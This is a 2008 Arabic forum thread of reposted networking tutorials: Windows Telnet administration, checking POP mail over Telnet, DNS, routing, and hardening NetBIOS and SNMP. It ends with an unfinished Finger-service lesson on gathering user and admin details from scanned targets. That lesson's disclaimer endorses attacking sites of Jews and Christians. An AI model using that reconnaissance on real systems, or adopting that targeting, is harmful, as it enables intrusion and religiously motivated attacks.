لفتح الأداة Telnet Server Admin , أضغط على Telnet Administration Tool الموجودة في Administrative Tools أو اضغط Start, ثم Run, اكتب tlntadmn, ثم OK. إذا كنت لا تستطيع فتح الأداة Telnet Server Admin , تحتاج إلى تثبيت أدوات الإدارة (Adminpak.msi).
يتبع ...
__________________
[align=center][glint]لا إله إلا الله محمداً رسول الله[/glint]
[caution]لا إله إلا الله محمداً رسول الله
سبحان الله و بحمده ... سبحان الله العظيم
اللهم قني عذاب جهنم و عذاب القبر و فتنة المحيى و الممات و شر فتنة المسيح الدجال ... آمين [/caution]
[/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]

[email protected]
Syrian Hacker غير متصل  
قديم 16-02-2008, 01:57   #6
:: عضو مميز ::
 
الصورة الرمزية Syrian Hacker
 
تاريخ التسجيل: Feb 2008
الدولة: System32\Config\SAM
المشاركات: 112
عميل التلنت
You can use Microsoft Telnet Client to connect to a remote computer running the Telnet service or other Telnet server software. Once you have made this connection, you can communicate with the Telnet server. The type of session you conduct depends on how the Telnet software is configured. Communication, games, system administration, and local logon simulations are some typical uses of Telnet.
The Telnet client uses the Telnet protocol, part of the TCP/IP suite of protocols, to connect to a remote computer over a network. The Telnet client software allows a computer to connect to a remote server. You can use the Telnet client provided with Windows 2000 to connect to a remote computer, log on to the remote computer, and interact with it as if you were sitting in front of it.
Users of previous versions of Microsoft's Telnet client may notice a few changes in the version included with Windows 2000. The most obvious change is that Microsoft Telnet Client is now a command-line application rather than a Windows application. As a command-line application, Microsoft Telnet Client will seem very familiar to users of UNIX-based Telnet clients.
An important new feature found in Microsoft Telnet Client is NTLM authentication support. Using this feature, a computer using Microsoft Telnet Client can log on to a Windows 2000 computer running the Telnet service by using NTLM authentication.

إستعمال التلنت
لتشغيل Telnet, انقر Start, ثم Run, ثم اكتب telnet. وتستطيع كتابة telnet في موجه الأوامر. لتتمكن من أستخدام التلنت يجب أن يكون البروتوكول TCP/IP مثبت على جهازك ومضبوط تكوينه ويكون لديك حساب مسجل على الجهاز الذي ستتصل به
To display help for Telnet, type help at the Microsoft Telnet command prompt. To connect to a site, type open <computer_name> where <computer_name> is the IP address or host name of the computer running the Telnet service.
تمرين ضبط وإتصال بخدمة التلنت
في هذا التمرين يجب أن يكون لديك شبكة على الأقل جهازين متصلين مع بعضهم البعض
ولنفترض أن الجهاز الاول اسمه Hishem1 و الثاني Hishem2
وسنفترض أن خدمة التلنت مثبته على Hishem2 ثم سنقوم بالإتصال من Hishem1 إلى Hishem2
سنقوم الآن بتثبيت الخدمة على جهاز Hishem1
سجل الدخول إلى Hishem1 ك Administrator
من Start , ثم Programs, ثم Administrative Tools اضغط Services.
تظهر الأداة Services
من النافذه مرر ألى اسفل ثم ضغط مزدوج على Telnet.
يظهر مربع حوارThe Telnet Properties (Local Computer)
غير Startup Type من Manual إلى Automatic.
في القسم Service status,اضغط Start .
اضغط OK لإغلق مربع الحوار (Local Computer) Telnet properties
أغلق وحدة التحكم Services .

سنتصل من Hishem1 إلى Hishem2

من Start , ثم Run.
اكتب telnet ثم OK.
تظهر موجه أوامر مايكروسوفت تلنت
اكتب help أو ? لمشاهدة الأوامر المتاحه
تظهر جميع الأوامر المدعومة في خدمة التلنت
اكتب open Hishem2
ستشاهد شاشة الترحيب

ملاحظة
يمكن إستخدام حرف o بدل open
أي اوامر يمكنك تشغيلها من سطر الأوامر في Hishem2
اترك هذا الإتصال نشط لا توقفه سننتقل الآن إلى جهاز Hishem2 لمشاهدة جلسة التلنت

من جهاز Hishme2 سنراقب خدمة التلنت ثم نوقف ونقطع الإتصال من العميل Hishem1

من Start , ثم Run.
اكتب tlntadmn ثم OK.
يظهر إطار اوامر الأداة Telnet Server Admin
اكتب 1 لمشاهدة جميع الإتصالات الحالية كما في المثال نشاهد قد عرض اسم المستخدم و اسم الدومين NOR ورقم IP ونوع الاتصال ووقت الدخول
اكتب 2 لإنهاء جلسة مستخدم
تظهر رسالة تطلب منك تحديد هوية المستخدم الذي تريد فصله
اكتب 1هذا رقم المستخدم في القائمة ولا يوجد معنا في المثال غير و احد لذالك تكتب 1
تظهر لائحة بالاوامر المتاحة
إرجع إلى جهاز Hishem1 سترا أن الاتصال قد إنفصل مثل المثال
اضغط أي مفتاح للمتابعة
كيف نستفيد من خدمة التلنت في جلب البريد
إذ تعذر عليك سحب البريد بالبرامج المخصصة لسبب ما يمكن أن تستخدم التلنت لسحب البريد وحذف الرسائل التي قد تكون سبب المشكلة و الطريقة كما يلي
تكون على إتصال مع الشبكة
من Start ثم Run ثم تكتب Telnet pop.mail.yahoo.com 110 طبعا إذا كان حسابك مع الياهو أو اكتب الحساب الخاص بك مع ملاحظة وجود فراغ بين الكلمة الاولى و الجملة الثانية و الرقم
ستظهر لك نافذة مثل الدوس اكتب user ثم اكتب بعدها اسم المستخدم في بريدك مع ملاحظة أن الذي ستكتبه لا تشاهده على النافذة لا تهتم مثل user xxxx ثم إنتر
بعد ذلك اكتب pass ثم اكتب الرقم السري مثل pass xxxx ثم إنتر
إذا كان إدخالك صحيح ستشاهد كلمة Ok بعد ما تضغط إنتر

سيتم إدخالك إلى الحساب
لمشاهدة جميع الرسائل وأحجامها اكتبList ثم إنتر
ستشاهد ترتيب الرسائل تحت بعض وأمام كل رقم رقم ثاني يدل على حجم الرسالة

لحذف رسالة من القائمة اكتب dele ثم رقم الرسالة الهدف
تنفع هذه الطريقة مع بريد pop
طريقة سحب البريد عن طريق التلنت من الدكتور الفنتوخ
بعض الأوامر المستخدمة مع التلنت
وصل عميل التلنت مع جهاز بعيد
بناء الجملة
open [\\RemoteServer] [Port]
المعلمات
\\RemoteServer
تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقماً ما، سيتم افتراض الملقم المحلي.
Port
تحديد المنفذ الذي تريد استخدامه. إن لم تحدد منفذاً ما، سيتم افتراض المنفذ الافتراضي.
ملاحظات
يمكنك اختصار هذا الأمر إلى o.
أمثلة
للاتصال بملقم بعيد Redmond من خلال رقم المنفذ 44، اكتب:
o redmond 44

لقطع تصال عميل Telnet من كمبيوتر بعيد
بناء الجملة
close [\\RemoteServer]
المعلمات
\\RemoteServer
تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقماً ما، سيتم افتراض الملقم المحلي.
ملاحظات
يمكنك اختصار هذا الأمر إلى c.
أمثلة
لقطع الاتصال من ملقم بعيد Redmond، اكتب:
c redmond 44

لإرسال أوامر عميل Telnet
بناء الجملة
send [\\RemoteServer] [ao] [ayt] [esc] [ip] [synch] [?]
المعلمات
\\RemoteServer
تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقماً ما، سيتم افتراض الملقم المحلي.
ao
إحباط أمر الإخراج.
ayt
إرسال أمر "Are you there?".
esc
إرسال حرف الهروب الحالي.
ip
مقاطعة أمر العملية.
synch
أداء عملية تزامن Telnet.

لعرض الإعدادات الحالية لعميل Telnet
بناء الجملة
display
المعلمات
بلا
ملاحظات
يسرد الأمر display معلمات التشغيل الحالية لعميل Telnet. إذا كنت في جلسة عمل Telnet (بعبارة أخرى، إذا كنت متصلاً بملقم Telnet)، يمكنك الخروج من جلسة عمل Telnet لتعديل المعلمات بضغط CTRL+]. للعودة إلى جلسة عمل Telnet، اضغط ENTER.

إدارة ملقم التلنت المحلي بالـ tlntadmn
لإدارة كمبيوتر يشغل ملقم Telnet
بناء الجملة
tlntadmn [\\RemoteServer] [start] [stop] [pause] [continue]
المعلمات
\\RemoteServer
تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقماً ما، سيتم افتراض الملقم المحلي.
start
بدء تشغيل ملقم Telnet.
stop
إيقاف تشغيل ملقم Telnet.
pause
مقاطعة ملقم Telnet.
continue
استئناف ملقم Telnet.
ملاحظات
يمكنك إدارة كمبيوتر عن بعد يشغل ملقم Telnet باستخدام الأوامر tlntadmn إذا كان كلاً من جهازي الكمبيوتر يشغلان نفس نظام التشغيل فإذا المطلوب ويندوز2000 استخدمه بي ويندوز 2000. لا يمكنك استخدام الأوامر tlntadmn لإدارة كمبيوتر عن بعد يشغل Windows 2000 وملقم Telnet من كمبيوتر يشغل Windows XP مثلاً.
لتعيين الحد الأقصى لعدد الاتصالات على كمبيوتر يشغل ملقم Telnet
بناء الجملة
tlntadmn [\\RemoteServer] config [maxconn=PositiveInteger]
المعلمات
\\RemoteServer
تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقماً ما، سيتم افتراض الملقم المحلي.
maxconn=PositiveInteger
تعيين العدد الأعظمي للاتصالات. يجب عليك تحديد هذا العدد بواسطة عدد صحيح موجب أصغر من 10 ملايين.

لتعيين العدد الأعظمي لمحاولات تسجيل الدخول الفاشلة على كمبيوتر يشغل ملقم Telnet
بناء الجملة
tlntadmn [\\RemoteServer] config [maxfail=PositiveInteger]
المعلمات
\\RemoteServer
تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقماً ما، سيتم افتراض الملقم المحلي.
maxfail=PositiveInteger
تعيين الحد الأقصى لمحاولات تسجيل الدخول الفاشلة المسموح بها للمستخدم. يجب عليك تحديد هذا العدد بواسطة عدد صحيح موجب أصغر من 100.

لتعيين المهلة من أجل خمول جلسات العمل على كمبيوتر يشغل ملقم Telnet
بناء الجملة
tlntadmn [\\RemoteServer] config [timeout=hh:mm:ss]
المعلمات
\\RemoteServer
تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقماً ما، سيتم افتراض الملقم المحلي.
timeout=hh:mm:ss
تعيين فترة المهلة بالساعات، والدقائق، والثواني.
دائماً يستخدم الـ ‎/?‎ لعرض التعليمات في موجه الأوامر..
انتهى،،،
__________________
[align=center][glint]لا إله إلا الله محمداً رسول الله[/glint]
[caution]لا إله إلا الله محمداً رسول الله
سبحان الله و بحمده ... سبحان الله العظيم
اللهم قني عذاب جهنم و عذاب القبر و فتنة المحيى و الممات و شر فتنة المسيح الدجال ... آمين [/caution]
[/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]

[email protected]
Syrian Hacker غير متصل  
قديم 16-02-2008, 02:00   #7
:: عضو مميز ::
 
الصورة الرمزية Syrian Hacker
 
تاريخ التسجيل: Feb 2008
الدولة: System32\Config\SAM
المشاركات: 112
" معلومات عن الـDNS "
<منقول من منتدى إعصار>
<الكاتب: Dark Devil >
قبل ان نبدأ دعونا نعقد اتفاق معا :
فلننسا كلمه هكر و لنبدأ فى تعلم الاشياء التى توصلنا لكلمه هكر بمعنى الكلمه و طبعا الهكر ليس معنا تروجن هورسس او سب سفن .....الخ
الهكر الحقيقى هو تعلم نظم التشغيل مثل اللينكس و اليونكس و تعلم لغات تصميم المواقع بجانب بعض لغات البرمجه التى يكون اهمها فى مجالنا هى لغه السى C
و الان دعونا من كل هذه الخلابيط و لنبدأ التكلم فى المفيد:
نحن فى بعض الاحيان نسمع عن اشياء كثيره و لكن لا نعرف ما هى و لا نحاول ان نكتشف و نعرف ما هى و فى هذا الملف سوف نتكلم عن شئ نسمع عنه كثيرا و لكن معظمنا لا يعرف
ما هو :
و هذا الشئ هو ال DNS:
و سوف نبدأ بالتحدث عن هذا الاسم الذى يسمعه الكثيرين و لكن لا يعرفون ما هو :
و لنبدأ بالسؤال نفسه
==================================================

=========================
ما هو ال DNS?
==============
اولا : DNS هو اختصار لكلمه Domain Name System . و يتصل سرفر ال DNS عادتا على بورت 53 مما يعنى انك اذا اردت الاتصال الى احد المواقع و استعملت ال DNS حقه فسوف تتصل
به عن طريق البورت 53 و سوف يترجم او يحول ال translates alphabetical hostnames و يعنى اسم الموقع مثل : http://www.burn.com/ الى IP ADRESSES مثل 127.0.0.1 و العكس صحيح و عندما تتم العمليه
تتصل بالموقع مباشره
و عمليه التحويل هذه تسمى address resolution اى تحويل او تحليل عنوان الموقع الى IP او العكس لنستطيع الاتصال به
و قبل ظهور ال DNS كان اسم اخر لعمليه ال address resolution .و لكن قد ظهر ال DNS لجعل توزيع الهوستس اسهل بكثير من الماضى حيث انه من
السهل ان تتذكر اسم موقع معين تريده افضل من ان تتذكر اربعه خانات من الارقام (IP) .
و كان الاسم المستعمل ل ال address resolution قبل ال DNS كان يتكون من ملف اسمه ال HOST FILE و كان عباره عن اسماء الهوستس اى المواقع
و عنواوين ال IP الخاصه بهم و كان هذا الملف تتولى رعايته Stanford Research Institute's Network Information Center (SRI-NIC). و كان على هذا الراعى ان
يجدد (UPDATE) الجدول هذا حوالى كل اسبوع و يمده بالعنواوين الجديده و الارقام التى ظهرت و على السيستم ادمين ان يجدد هو الاخر ملفه او
عن طريق اتصال ال FTP بينه و بين الراعى اى SRI-NIC.
و طبعا مع تطور النترنت الرهيب و السريع بدأ هذا النظام فى الفشل و بدأو يبحثون عن النظام الامثل الذى يستطيع التحكم فى الهوست و الاى بى
معا فى وقت واحد و بسرعه و بترتب و دقه و طبعا ظهر ال DNS ليفعل ذلك.
و ال DNS ليس له مركز اى decentralized اى انه ليس هناك ماكينه او سيستم معين يتحكم فى كل ال DNS بل بالعكس فال DNS عباره عن داتا بيز
موزعه بشكل منظم و توجد على كذا سرفر مختلف و كل سرفر عليه DNS يعرف اين يبحث عندما يريد ان يحصل على معلومه معينه او هوست معين.
هذا بالنسبه لمعلومات عامه عن ال DNS و كيف كان النظام قبل اكتشافه و هى ايضا نظره عامه عن حركه الانترنت القديمه .

THE DNS SERVER:
================
ال DNS SERVER هو عباره عن كمبيوتر و يعمل عادتا على نظام UNIX او النظم الشبيهه باليونكس و يستخدم برنامج اليونكس BIND اى (Berkeley Internet Name Domain). و يوجد ايضا برامج مثل هذه للويندوز و الماكنتوش ايضا
اذا اراد احد استعمالهم ك DNS SERVER و لكن الكل يفضل ال UNIX .
و يتكون برنامج ال DNS من جزئين :
the name server itself (the daemon program that listens to port 53) و الاخر يسمى RESOLVER
و ال NAME SERVER هذا يستجيب الى متصفحك عندما تطلب معلومه معينه فمثلا عندما تفتح الانترنت اكسبلورر و تكتب او تطلب منه موقه معين مثل
http://www.burn.com/ فسيسئل المتصفح اقرب DNS موجود له (و هذا يعتمد على اتصالك بالشبكه و رقم الاى بى الخاص بك) عن عنوان ال IP ل http://www.burn.com/
لان المتصفح يحتاج هذا ال IP ليجد السرفر الذى لديه هذا الهوست اى هذا الموقع و يطلب محتويات الموقع من السرفر ليعرضها لك فى متصفحك.
و قبل هذا سيسئل ال daemon program فى جداوله اى فى ذاكره متصفحك عن الموقع الذى تطلبه فأذا لم يجده ينتقل الى ما سبق شرحه و هكذا تتم العمليه.

THE TREE INFORMATION:
======================
و الان اصدقائى بعد ان اتقفنا على انك عندما تطلب رقم IP معين من المتصفح حقك و لا يجده فى ال DNS المحلى اى الخاص بك سوف يسأل ال DNS SERVER الاعلى منه فى المستوى عنه ليجده و اذا لم يجده فى مستوى اعلى فينتقل للبحث فى مستوى اعلى و اعلى و هكذا يسير البحث من الاقل الى الاعلى فى مستويات ال DNS SERVERS.
و طبعا نتيجه من هذا الاتصال فنستنتج وجود شجره اتصال و معلومات و لكن كيف تعمل بالضبط
دعونا نأخذ مثال :
لو فرضنا ان ال ISP الخاص بك كان مثلا isp.co.uk و هذا يعتمد على اتصالك بالانترنت اى حسب الشركه و السرفر الذى تشبك عليه فمن الطبيعى طبعا ان يكون ال ISP's DNS server's hostname مثل هذا dns.isp.co.uk و الان فالنفرض انك سألت هذا ال DNS ليبحث لك عن IP الخاص ب http://www.burn.com/ مثلا فسيقوم هذا ال dns.isp.co.uk بالبحث فى جداوله المحليه المخذنه فى الذاكره عنده فيجدها و اذا لم يجدها فسينتقل كما قلنا الى مستوى اعلى من ال DNS SERVER ليبحث فيه و اذا لم يجده ايضا فى المستوى الاعلى فعليه ان يقوم بتغيير مكان البحث كليا فمثلا من dns.isp.co.uk الى some-organization.org.uk او school.edu.uk, university.ac.uk, england.gov.uk, airforce.mil.uk و الخ و هناك امثله كثيرا طبعا و كل شئ ينتهى ب UK و اذا لم يجده ايضا فى كل الاماكن المتاح له البحث فيها فسيرجع المتصفح الى اكبر DNS موجود على الشبكه و اسمه ال ROOT فهو يحتوى على كل عناوين ال IP على كل للمواقع الموجوده على اى DOMAIN NAME.

When and why does DNS "hang" or fail?
======================================
و يمكن ايضا لل DNS ان يكون بطئ او سريع .اذا كان ال ISP الخاص بك يحنوى على ال IP الذى طلبته فسوف يحتاج فقط الى اجزاء من الثانيه ليأتى به لك و يعرضه فى متصفحك. اما اذا انتقل المتصفح للبحث فى مستوى اعلى من ال DNS فسوف يحتاج الى قليلا من الوقت يمتد حتى 15 ثانيه . و فى حاله انه لا يجده سوف تأتيك رساله من متصفحك تقول address could not be found و هذا يحدث نتيجه اعطاء المتصفح HOST او IP خطأ ليبحث عنه و بالتالى طبعا فهو ليس موجود من الاساس ليعرضه او نتيجه طول البحث فيقوم متصفحك بقدان الاتصال مع ال DNS اى عمليه TIMED OUT .
و فى هذه الحاله نضغط فى المتصفح على &@#&@#&@#&@#&@#&@#&@# او RELOAD طبعا حسب متصفحك .


ارجو ان اكون قد افدتكم جميعا بهذه المعلومات التى هى بعيده عن الهكر و لكنها اساس فى تعلم الهكر يا اصدقائى و كما قلت لكم الهكر ليس التروجان و الباتشات الهكر هو تعلم اساليب البرمجه و كيفيه تصميم المواقع و معرفه كل شئ جديد فى عالم الانترنت و ارجو من المحترفين الدخول و قرائه الموضوع و تصحيح الاخطاء التى به حتى يكون موضوع كامل و متكامل خالى من الاخطاء و نتظر ردودكم و تفاعلكم مع المعلومات و اى سؤال انا موجود على قد مقدرتى
و انتظرو موضوعى القادم و هو معلومات عن ال SSL و سنعرف ما هو بالتفصيل
و السلام عليكم و رحمه الله و بركاته.
انتهى،،،


" معلومات عن Routing in the Internet "
<منقول من منتدى إعصار>
<الكاتب: Dark Devil >
السلام عليكم و رحمه الله و بركاته:
سوف نتكلم يا اصدقائى عن شئ مهم فى علم الشبكات و الكثير منكم على غير علم به و هذا الشئ هو الRouting.
و الان دعونا نبدأ و اتمنى ان يعجبكم الموضوع و تستفيدون منه:
Routing in the Internet:
=========================
what is routing?!
الروتنج هو عباره عن تكنيك او ميكانزم الذى عن طريقه تنتقل المعلومات من كمبيوتر الى اخر او من هوست الى اخر.
و فى سياق الانترنت يوجد ثلاث مظاهر من الروتنج وهم:
1-Physical Address Determination

2-Selection of inter-network gateways

3-Symbolic and Numeric Addresses

و يعتبر الاول فى هذه الاشياء هو المهم عندما تنتقل داتا الip من الكمبيوتر.فمن الدرورى ان نغلف هذه الداتا الخاصه بالip بأى أطار من اى صيغه تكون متصله بالنت ورك المحليه للجهاز او بالنت ورك المتصل بها الجهاز فى حالته الموجود عليها عند انتقال هذه الداتا.و يتطلب هذا الغلاف التضمين من ال عنوان النت ورك المحليه او العنوان الفيزيائى لهذا للشبكه مع الاطار الذى يحيط بالبيانات اى (inclusion of a local network address or physical address within the *****).

و الشئ الثانى من المذكور اعلاه مهم ايضا و درورى لان الانترنت تتكون من عدد من النت وركس المحليه اى local networks مربوطه بواحد او كثير من المداخل اى الgateways.و هذه المداخل عموما تسمى بالروترس اى الrouters ,احيانا يكون لها اتصالات فيزيائيه او بورتات مع الكثير من النت وركس .و تحديد المدخل الملائم و البورت لتفصيل داتا الip هذا ما نسميه روتنج اى routing و تتضمن ايضا داخل تبادل المعلومات بطرق معينه.

و الثالث من المذكور هو الذى يتضمن انتقال العنوان اى الaddress translation من الشكل الكتابى الذى نعرفه و نستطيع التعرف عليه بسهوله و المقصود مثلا عنوان المتصفح اى http://www.burn.com/ الى ip اى الى اشياء رقميه معقده صعبه و تؤدى هذه المهمه عن طريق ال DNS (ارجو مراجعه موضوعى الاول عن الDNS للاستفاده اكثر ).

و الان ندخل فى شرح عمليه تحديد الPhysical Address اى :
Physical Address Determination:
===============================
اذا كان يريد جهاز كمبيوتر ان ينقل ip data اذن فأنه يحتاج الى ان يغلف بأطار مخصص و تابع للنتورك المتصل الجهاز بها. و لنجاح هذا الانتقال فى ظل الغليف بهذا الاطار من الدرورى ان نحدد ما يسمى بالphysical address لأتجاه الكمبيوتر. و هذا يتم بنجاح و ببساطه عن طريق استخدام جدول سوف يوضح كيفيه تحويل الip الى physical addresses , فمثلا هذا الجدول يحتوى على عناوين الip للنتوركس و الادرس او العنوان المعروف لها .
و للحصول على هذا الجدول و قرائته من الطبيعى ان يكون الكمبيوتر يستخدم بروتوكول معين للحصول على هذا الجدول و تحويل الip الى physical addresses و هذا البروتوكول يعرف بأسم ARP اى Address Resolution Protocol اى بروتوكول تحليل الادرس و اعتقد اننا الان ادركنا و فهمنا معنى كلمه تحويل الip الى physical addresses , و يمكن ان نعرف هذا الجدول بأسم ARP cache .

و للحصول على الجدول نستخدم امر arp -a و فى اليونكس ايضا نستخدم نفس الامر.
و هذا مثال حى من جهازى على الجدول الذى يظهر بعد تنفيذ الامر :
C:\WINDOWS>arp -a

Interface: 62.135.9.102 on Interface 0x2
Internet Address Physical Address Type
207.46.226.17 20-53-52-43-00-00 dynamic
213.131.64.2 20-53-52-43-00-00 dynamic
213.131.65.238 20-53-52-43-00-00 dynamic

الانترنت ادرس الموجود امامكم هذا هى عناوين كل الشبكات المتصله بجهازى بعد دخولى الى الانترنت
و الPhysical Address اعتقد انكم تلاحظون انه ثابت لا يتغير و بهذا يمكننا ان نقول و نوضح لكم ان الPhysical Address هذا هو ال Mac Address اى رقم الجهاز نفسه الذى تتصل به النتوركس اثناء العمل و لذلك فقد قلت فى كلامى ان تحديد ال Physical Address مهم جدااا فى عمليه نقل معلومات او داتا الip لانه بدون Physical Address اذن فكيف ستتعرف الباكيدجس الموجوده فى الrouter على طريقها.
و ال type هذا مكتوب dynamic اى انه غير ثابت بمعنى انه يتغيير عند عمل ريستارت لكل مره فى الجهاز و لكنه يثبت اثناء العمل على الانترنت .
و هناك النوع الاخر و هو الstatic اى الثابت الذى لا يتغير "هذا فقط للتوضيح"

اعتقد الان اننا فهمنا بمعنى بسيط ما هو الروتنج و ما هى الrouters
انتهى،،،


" NETBIOS "
<منقول من موقع نورة>
بعد قراءة هذا الموضوع ستكون قادر على
• صد الجلسات الخالية
• منع تعداد المستخدمين
• منع تعداد الـSNMP
يوجد في الإعداد الافتراضي للويندوز اعتماد على NetBIOS وهي مشكلة كبيرة لأصحاب الشبكات المهمة لأن الـNetBIOS لها واجهات تداخل API تعيد وترجع معلومات حول الهدف من خلال المنفذ 139 لـTCP ، وفي الحالة الافتراضية يكون الوصول ممكن حتى من مجهولين الهوية ، وطبعا هذا يكون فيه خطراً قد يكون كبير عند استخدامه من محترفين الولوج على أنظمة NT
تستطيع أن تلغي كل خدمات NetBIOS على جهاز ما عندما تجد أنها غير ظرورية لك ويكون ذلك من خصائص TCP/IP ثم من Advanced ثم من التبويب WINS ثم تعلم على الخيار الواضح في المثال التالي
وإذا كانت هذه الخدمة مهمة لك فقد قدمت شركة مايكروسوفت حلاً مناسباً وهى تدعى RestrictAnonymous وهي تحد بشكل كبير من تسرب المعلومات عبر الوصلات المجهولة ، وتستطيع الوصول إليها من Administrative TOOLS ثم من Local Security policy ثم من النافذة نختار Local poicies ثم من security options ثم نعلم على الخيار الأول Additional restrictions for anonymous connections ثم بالزر الايمن نختار security ثم من النافذة نختار من الشريط المنزلق الخيار No Access Without Explicit Anonymous Permissions
بعض الأمثله لإستخدام أدوات الـNetBIOS
 Net View
هذه الأداة مضمنه ضمن نظام التشغيل نفسه وهي أداة سطر اوامر على NT/W2000 وهي تعرض الميادين المتاحة وكل الاجهزة على هذه الميادين وكل الخدمات المتاحة لتشارك على الأجهزة ، ويكفي أن تكتب عنوان IP أو اسم الدومين حتى تكون قد حصلت على ما تريد
ولمعرفة المزيد عن إستخدامات الأمر Net في إدارة الشبكة انقر .
وتوجد بعض الأدوات المتاحة على الانترنت تقوم بنفس العمل بشكل احترافي منها هذه الأداة المدعوه Nbtscan وهي أيضاً اداة سطر أوامر وتستطيع أن تحملها من ...
ولمشاهدة شرح ميسر من ...
وتوجد أدوات رسومية شعبية كثيرة على الانترنت للقيام بنفس العمل منها على سبيل المثال البرنامج Legion ،

 الحل المريح
الحل المريح لتخلص من هذا الصداع هو حماية المنافذ المقدمه من البروتوكول TCP و البروتوكول UDP عبر المنافذ من 135 إلى المنفذ 139 +445 ، وكل برامج الجدران النارية المتقدمة تستطيع من خلالها أن تتحكم بالمنافذ بشكل مريح ، وشاهدنا كيف نلغي الخدمة NetBIOS أو نقلل من المشاكل المحتمله منها ، ورغم كل ذلك لازال الخطر موجوداً إذا كنت تستخدم البروتوكول SNMP لإدارة الشبكة على ويندوز 2000 سيرفر ، فهذا البروتوكول يمرر كل المعلومات المطلوبة إذا كان مثبتا ، ولتأمين هذا البروتوكول بالشكل المطلوب أمامك خيارين الاول
حذف اسم المجموعة Public التي تكون عند التثبيت الافتراضي وتكون أسماء مخصصة من مستخدمين الشبكة كما في المثال المجموعة public موجودة علم عليها ثم من الزر Re**** ثم حرر المربع Send authentication trap



بذلك تكون قد حصرت استخدام هذا البروتوكول للأشخاص المختارين فقط
والحل الثاني من محرر السجل regedit
HKEY_LOCAL_MACHINE\system\currentControlset\servec es\SNMP\parameters\ExtensionAgent
ثم قم بحذف المفتاح LANManagerMIB2Agent ثم قم بإعادة ترقيم المدخلات مثلاً إ ذا كان ما حذفته رقمه = واحد أعد الترقيم ليبدأ من واحد للمدخل رقم 2
هل تعلم أن البروتوكول TCP/IP يستطيع العمل بشكل سليم بدون خدمات الـNetBIOS ، لذلك إذا كنت غير محتاج إليه تعطيله أفضل

انتهى،،،


" بروتوكول خدمة Finger"
<منقول من منتديات شبكة الحزم الإسلامية>
<الكاتب: LAMeR>
السلام عليكم ورحمة الله وبركاته
اتمنى انكم تتقبلون مني هذا الدرس عن بروتوكول خدمة Finger التي تعمل على بورت 79

بسم الله نبدأ الدرس

فهرس محتويات الدرس
<================>

1.1 تبرئة
1.2 مقدمة عن Finger
1.3 استخدام Finger
1.4 بعض الخدع عند استخدام خدمة Finger
1.5 الأستعلام عن طريق موقع بأستخدام Finger
1.6 الأستنتاج من هذا الدرس
1.7 الختام



1.1 تبرئة:
<=========>
هذا الدرس فقط للتعليم والتطبيق على مواقع اليهود والنصاري الضاره للمسلمين
فالكاتب لا يتحمل اي مسؤولية للاستخدام السيء لهذا الدرس ضد أخواننا المسلمين.

1.2 مقدمة عن Finger
<===================>
إنّ Finger ديمون خدمة تعمل عن طريق البورت 79 عادة وكانت
مستخدمة أصلا كنوع businesscard رقمي للناس.
المستخدم البعيد(remote user ) يمكن أن يرسل طلب إلى Finger ديمون يجري على نظام معين
(بورت Finger نوعية 79) وسيحصل على إجابة.

هذه الإجابة ستخبرك من هم المستخدمين على هذا النظام و أيضا
بعض المعلومات عن هؤلاء المستخدمين المتصلين بالنظام.

إضافة إلى هذه المعلومات, في أغلب الأحيان الإجابة تخبرك أيضا من الذي يدير النظام(admin) وكيف قام بالإتصال.
قديما استخدم الناس الأتصال على جميع انواع الأنظمة في العالم وطلب الأستعلام عن هذه الأنظمة و الـ Finger كان يعطيهم معلومات عن
من هم الموجودون في النظام وهل لهم حسابات في هذا النظام.وكانFinger يستخدم قديما في
الجامعات و الشركات الكبيرة أيضا.

في الماضي ، الـ Finger إستعمل عامة عن طريق الطلاب في الجامعات
اذا ارادوا معلومات تخص طلاب اخرين في نفس الجامعه
وكثيرا ما تكون الأجابة (اجابة Finger Deamon ) بجملة " Finger me! " اي "أعلمني ! "
أما الآن ومع وجود شبكة الإنترنت العالمية اصبح Finger
أقل شهرة ، لأنه توجد الآن
مواقع الويب للعمل كبطاقة عمل(bisinesscard) رقمية خاصة بمستخدمين الأنترنت وبسبب ملاحظة الناس
التهديد الواسع للأمن الألكتروني قلّ استخدام خدمة Finger Deamon

على أية حال،
ليس كل الأنظمة منعت هذه الخدمة وستجد بعض المواقع ( الأنظمة) تقدم هذه الخدمة.
وهذه الأيام يقوم الهكرز بمحاولات اختراق الأنظمة بأستخدام برامج
portscans للبحث عن البورتات المفتوحة. . . بدون أيّ أساس علمي .
لذلك إنّ Finger ديمون، مثال عظيم لخدمة
يمكن استخدامها قانونيا لتزودك بكمية ضخمة من المعلومات الحسّاسة
حول هدف.
لهذا سوف أحاول ان اشرح في هذا الدرس بلغة مفهومة
ما هو Finger ديمون وماذا يفعل وكيف يمكن استخدامه في مصلحتك

الخلاصة المقدمة: ان خدمة Finger كانت قديما ولازالت تستخدم لجلب المعلومات عن
المستخدمين الموجودين في النظام و هل لديهم حسابات في هذا النظام ام لا .

ملاحظة : النظام( server ) هو جهاز كمبيوتر تخزن فيه معلومات هائلة ويستخدم في استضافة المواقع

1.3 استخدام Finger
<=================>

عند استخدام اي من برامج السكان المعروفة مثل (superscan ) للبحث
في موقع معين (مثلا http://www.foobar.com/ ) ووجدت به منفذ (Port بورت) 79 مفتوحا
هذا يعني ان http://www.foobar.com/
له Finger ديمون يعمل.
الآن كيف نقوم بـ(request) طلب استعلام؟
عن طريق وندوز
في أغلب الأحيان وندوز لا يوجدبه زبون (client) خاص للـ Finger مركب ( installed )

لذلك سوف نستخدم Telnet كخادم لـ Finger

--توضيح--
Telnet(client) --------request-------> Finger Deamon(in Server) o

عن طريق كتابة السطر الآتي في موجة الدوس (MS DOS ) :

telnet http://www.foobar.com/ 79

بعد ذلك سيظهر لك برنامج telnet و منه تطبع الأوامر .

اما من يونيكس
لسنا بحاجة إلى أن نستعمل تيلنت لأنه يوجد بنظام لينوكس زبون(client)خاص بخدمة Finger Deamon
مركّب على النظام بشكل دائم تقريبا.

